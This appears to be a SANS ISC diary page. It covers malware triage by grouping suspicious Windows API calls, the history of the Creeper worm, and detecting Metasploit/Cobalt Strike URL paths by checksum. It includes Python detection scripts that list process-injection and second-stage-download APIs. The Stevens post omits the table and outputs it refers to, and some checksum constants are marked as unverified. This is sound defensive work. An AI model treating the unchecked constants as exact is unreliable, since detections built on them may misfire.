Many attackers have a very deep knowledge of how the targeted operating systems behave and which controls are in place or which features could be (ab)used by malicious code. When you’re analyzing malware samples, it’s very important to quickly spot interesting blocks of code (by learning which interesting OS features they use). A classic example is the API call VirtualAllocEx()[2], which allocates a region of memory within the virtual address space of a specified process:

LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

hProcess is a handle to a process returned by OpenProcess(). Then, you use WriteProcessMemory() to write the specified contents into the memory of the targeted process. When you read this, you may ask yourself: “Wait… why does Microsoft allow a process to inject code into another process?”. The answer is simple: because it’s a key feature of the operating system and it can be used for many totally legitimate reasons. Think about antivirus programs! It’s common for an AV to inject code into other processes (e.g. into browsers, to inspect downloaded data).

API calls are a key aspect of malware analysis: not only the function itself but also its options. Here is another example. If you see a VirtualAlloc() call (the same applies to VirtualProtect()), check the protection parameter, which for VirtualAlloc() is the last one:

LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

flProtect sets the memory protection for the region of pages to be allocated. If you see the value 0x40 (PAGE_EXECUTE_READWRITE) for this parameter, it means the newly allocated memory will contain executable code![3]

An approach to flag samples during the triage process is to identify the groups of APIs that are used to perform suspicious actions like:

  • Code injection
  • DLL operations
  • Dropping 2nd stage

In my triage process, I use FLOSS[4] because it can extract a lot of API calls from strings, stack strings, etc. Then I pass the output to YARA to match interesting groups of APIs. Example:

remnux@remnux:/MalwareZoo/20210316$ floss sample.exe | ./yarawrapper.py suspicious-api-calls.yara
Matching: api_address_search
Matching: dll_operations

Why YARA? Because it makes it easy to write useful rules such as "any of these", "all of these", and/or combinations and groups of APIs. A sample of YARA rules is available here[5].
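As an added example (my code, not Xavier's yarawrapper.py or his rule file), this Python snippet does the same grouping over FLOSS-style output, one extracted string per line: each rule is a list of slots, any one name in a slot satisfies it, and a rule fires only when every slot is satisfied, which mirrors YARA's "all of" over "any of". The API names in each group are real Win32 functions but the grouping is my choice, and the FLOSS output is constructed for the example.

```python
import re

# Each rule is a list of slots; a slot is satisfied by any one of its names and
# the rule fires only when every slot is satisfied (YARA "all of" over "any of").
API_RULES = {
    "code_injection": [
        {"OpenProcess"},
        {"VirtualAllocEx"},
        {"WriteProcessMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC", "SetThreadContext"},
    ],
    "dll_operations": [
        {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"},
        {"GetProcAddress"},
    ],
    "drop_second_stage": [
        {"URLDownloadToFileA", "URLDownloadToFileW", "InternetReadFile", "WinHttpReadData"},
        {"CreateFileA", "CreateFileW", "WriteFile"},
        {"CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW", "WinExec"},
    ],
}

# Constructed FLOSS-style output (not a real sample): banner lines plus strings.
SAMPLE_FLOSS_OUTPUT = """\
FLOSS static ASCII strings
!This program cannot be run in DOS mode.
kernel32.dll
OpenProcess
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
LoadLibraryA
GetProcAddress
FLOSS decoded 1 strings
http://example.invalid/stage2
"""

# A Win32 API name as it appears in an import table or a stack string:
# CamelCase identifier, no spaces, at least four characters.
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9_]{3,}$")


def parse_floss_output(text):
    """Return the set of extracted strings that look like API names."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if API_NAME.match(line):
            names.add(line)
    return names


def match_api_groups(names):
    """Return {rule: matched names in slot order} for every rule whose slots are all satisfied."""
    matches = {}
    for rule, slots in API_RULES.items():
        matched = []
        for slot in slots:
            hit = sorted(slot & names)
            if not hit:
                break                # one unsatisfied slot and the rule does not fire
            matched.extend(hit)
        else:
            matches[rule] = matched
    return matches


if __name__ == "__main__":
    for rule, apis in match_api_groups(parse_floss_output(SAMPLE_FLOSS_OUTPUT)).items():
        print(f"Matching: {rule} ({', '.join(apis)})")
```

Requiring every slot, rather than any single API, is what keeps a rule like code_injection from firing on every program that merely imports OpenProcess; the trade-off is that a sample resolving its imports by hash will show none of these strings, which is exactly the kind of gap FLOSS's stack-string and decoded-string output helps to close.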

Happy hunting!

[1] http://for610.com
[2] https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
[3] https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants
[4] https://github.com/fireeye/flare-floss
[5] https://github.com/xme/yara-rules/blob/main/suspicious-api-calls.yara

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

March 17, 2021

ISC Stormcast For Wednesday, March 17th, 2021 https://isc.sans.edu/podcastdetail.html?id=7416, (Wed, Mar 17th)

March 16, 2021

50 years of malware? Not really. 50 years of computer worms? That's a different story..., (Tue, Mar 16th)

If you have any interest in the history of malicious code, chances are you’ve heard or read somewhere that the first piece of malware ever created was a computer worm called Creeper and that spread itself through the ARPANET in 1971. Some sources even mention that it might have been on this very date, i.e. exactly 50 years ago[1].

So does malware really turn 50 today?

Not likely. Even leaving aside that, according to some sources[2], a fork bomb[3] program may have been created as far back as 1969, in which case the oldest malware might already be over 50 years old, the simple fact is that Creeper wasn’t malware in any sense of the word... Although it was probably the first example of a (benign) computer worm ever created.

In the multiple retellings of its legend that may be found both online and in print, we have, however, a prime example of something which is unfortunately relatively common (not just) in infosec. That is repeating of interesting-looking information without checking for any original sources, which might provide context to it. I don’t mind admitting that this is a pet peeve of mine[4] and so I thought that on this day, which may or may not mark the 50th anniversary of the original “run” of Creeper, it might be a good idea to take a look at what we really know about it.

According to the few trustworthy articles on the subject, which cite their sources[5,6], and explanations provided by Ray Tomlinson, who played a significant part in the story of Creeper[7,8], the program was created at BBN Technologies at some point in 1971. At that time, BBN was developing TENEX, an operating system for the PDP-10 computer. One of the developers of TENEX was Robert Thomas, who, among other projects, worked on what was called a Resource Sharing Executive, or RSEXEC – an experiment with what was thought of as a “mobile application” concept. RSEXEC was basically supposed to enable a program to “jump” between computers so that it would always be executed by a machine with unutilized computational resources or with the data the program needed. As you’ve probably guessed, Creeper was the demonstration program that resulted from Thomas’s work.

The original application was tested using (at most) 28 computers connected to the ARPANET and running the TENEX OS. Creeper migrated from one system to another, always "removing" itself from the machine it was leaving. What is important to note is that this was done with the full agreement and cooperation of the operators of all those computers and that the test had no negative effects on them. All that Creeper supposedly did on “visited” computers was print the famous message “I’M THE CREEPER : CATCH ME IF YOU CAN” on a teletype.


Message printed by Creeper[5]

An indeterminate amount of time later, Ray Tomlinson, who worked at BBN Technologies at the same time as Bob Thomas, created a modified version of Creeper. The program originally jumped from one machine to another, which meant that there was always only one copy of it on the entire network (computer worms which behave in this way are sometimes called “rabbits”). The new version created by Tomlinson had the ability to replicate itself, i.e. create multiple copies of itself which might exist at the same time on different machines (meaning it behaved more like a usual computer worm). This updated version was - once again - not malicious in any way, and one may think of it as a demonstration of the concept of distributed computation more than anything else.

Since it was able to replicate itself and it was necessary to make sure it didn’t cause any problems even in case of bugs which might make it hang, Tomlinson also created a program called Reaper. This was a simple piece of code, which visited each of the approximately 28 computers, which might have hosted Creeper, and terminated any instances of Creeper it found running on them.

Due to this behavior, Reaper is sometimes called “the first anti-virus”[9]. Since neither version of Creeper was malicious in any way, depending on your definition of "anti-virus" this title may or may not be applicable. Reaper however almost certainly may be called the first “nematode” (a worm or virus, which removes another worm or virus from a system, on which it is present).

So, based on the history we've recounted, what may we say with any sort of certainty regarding the age of malware? Not much. In terms of the age of computer worms, however, chances are good that they really are turning 50 this year, whether it is today or not. It is a little bit sad that one tends to think of every computer worm as being malicious “by default”, since, as this little trip down memory lane shows us, it doesn’t necessarily have to be true...

In any case, if you’d like to learn a bit more about the origins of modern malware (and don’t mind low-quality video editing), the following video might be worth your time.

[1] https://www.cybersecurity-insiders.com/a-brief-history-of-cybersecurity/
[2] http://catb.org/~esr/jargon/html/W/wabbit.html
[3] https://en.wikipedia.org/wiki/Fork_bomb
[4] https://untrustednetwork.net/en/2019/10/19/do-automated-tools-really-detect-only-45-of-all-vulnerabilities/
[5] https://corewar.co.uk/creeper.htm
[6] http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.137.9511&rep=rep1&type=pdf
[7] https://history-computer.com/the-first-computer-virus-of-bob-thomas-complete-history/
[8] https://nerdology.org/2014/11/qa-with-ray-tomlinson-on-creeper/
[9] https://en.wikipedia.org/wiki/Reaper_(program)

-----------
Jan Kopriva
@jk0pr
Alef Nula

March 16, 2021

ISC Stormcast For Tuesday, March 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7414, (Tue, Mar 16th)

March 15, 2021

Finding Metasploit & Cobalt Strike URLs, (Mon, Mar 15th)

Metasploit and Cobalt Strike generate shellcode for http(s) shells. The URLs found in this shellcode have a path that consists of 4 random alphanumeric characters. But they are not completely random: their 8-bit checksum is a member of a small set of constants.

The 8-bit checksum is the sum of the ASCII value of the 4 characters of the path. Take the least significant byte of the sum, and compare it with this table:

If the checksum is equal to one of these values, the URL could be generated by Metasploit or Cobalt Strike.

I illustrate this with Brad's capture file of Qakbot & Cobalt Strike traffic and my tool metatool.py.

Wireshark's command-line tool tshark is what I used to produce a complete packet tree for each packet. The URLs we are looking for will be somewhere in this output:

And then I pipe this output into my metatool.py with command url8:

metatool found 2 (identical) URLs whose path has an 8-bit checksum equal to 0x5C (92), or URI_CHECKSUM_INITW, i.e. the 8-bit checksum for a Windows payload.
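As an added example (my code, not metatool.py), here is the checksum calculation described above applied to sample URL paths and to constructed Apache-style log lines (not Brad's capture). The constants are the ones I know from Metasploit's uri_checksum.rb, with 0x5C/92 (URI_CHECKSUM_INITW) being the value cited above; the other entries are quoted from memory of that file and the dictionary is meant to be extended with whatever else the table lists. The last function computes exactly how often a random 4-character alphanumeric path collides with the set, which puts a number on the low-entropy caveat.

```python
import re
import string

# 8-bit URI checksum values from Metasploit's Rex::Payloads::Meterpreter::UriChecksum
# (lib/rex/payloads/meterpreter/uri_checksum.rb). 92 (0x5C) is the value cited
# above; the others are quoted from memory and should be checked against the source.
URI_CHECKSUMS = {
    92: "URI_CHECKSUM_INITW (Windows) / URI_CHECKSUM_INITN (native)",
    80: "URI_CHECKSUM_INITP (Python)",
    88: "URI_CHECKSUM_INITJ (Java)",
    98: "URI_CHECKSUM_CONN (existing session)",
    95: "URI_CHECKSUM_INIT_CONN (stageless)",
}

# Constructed access-log lines (combined log format), not from a real capture.
SAMPLE_LOG = [
    '10.0.0.12 - - [15/Mar/2021:10:01:02 +0000] "GET /aaa9 HTTP/1.1" 200 3412',
    '10.0.0.12 - - [15/Mar/2021:10:01:03 +0000] "GET /abcd HTTP/1.1" 404 153',
    '10.0.0.12 - - [15/Mar/2021:10:01:04 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

PATH_RE = re.compile(r"^/([A-Za-z0-9]+)$")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ALNUM = string.ascii_letters + string.digits


def checksum8(path_chars: str) -> int:
    """Sum of the ASCII values of the characters, least significant byte only."""
    return sum(ord(c) for c in path_chars) & 0xFF


def classify_url_path(path: str, length: int = 4):
    """Return (checksum, label) when `path` is '/' followed by exactly `length`
    alphanumerics whose 8-bit checksum is a known value, else None."""
    m = PATH_RE.match(path)
    if m is None or len(m.group(1)) != length:
        return None
    value = checksum8(m.group(1))
    if value in URI_CHECKSUMS:
        return value, URI_CHECKSUMS[value]
    return None


def scan_http_log(lines, length: int = 4):
    """Return [(line_number, path, checksum, label)] for requests whose path qualifies."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        path = m.group(1).split("?", 1)[0]
        result = classify_url_path(path, length)
        if result is not None:
            hits.append((number, path, result[0], result[1]))
    return hits


def match_fraction(length: int = 4) -> float:
    """Exact fraction of uniformly random alphanumeric paths of this length whose
    checksum lands in URI_CHECKSUMS, computed by convolving the per-character
    distribution modulo 256 (no enumeration of all 62**length paths needed)."""
    dist = [0] * 256
    dist[0] = 1
    for _ in range(length):
        nxt = [0] * 256
        for value, count in enumerate(dist):
            if count:
                for c in ALNUM:
                    nxt[(value + ord(c)) & 0xFF] += count
        dist = nxt
    return sum(dist[v] for v in URI_CHECKSUMS) / sum(dist)


if __name__ == "__main__":
    for number, path, value, label in scan_http_log(SAMPLE_LOG):
        print(f"line {number}: {path} checksum 0x{value:02X} ({value}) {label}")
    print(f"random 4-char paths matching the set: {match_fraction(4):.2%}")
```

The collision rate comes out at a few percent for 4-character paths, noticeably worse than the naive 5/256, because the sum of four alphanumeric codes clusters around 347 and the constants 80 to 98 sit right at that peak once reduced modulo 256. That is the quantitative reason this check belongs in a targeted investigation rather than in a blanket proxy-log hunt.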


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

March 15, 2021

ISC Stormcast For Monday, March 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7412, (Mon, Mar 15th)

March 14, 2021

Wireshark 3.4.4 Released, (Sun, Mar 14th)

Wireshark version 3.4.4 was released.

There's one vulnerability fix and many bug fixes.

The vulnerability is that Wireshark could open unsafe URLs, as illustrated in a video posted with the bug report.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com
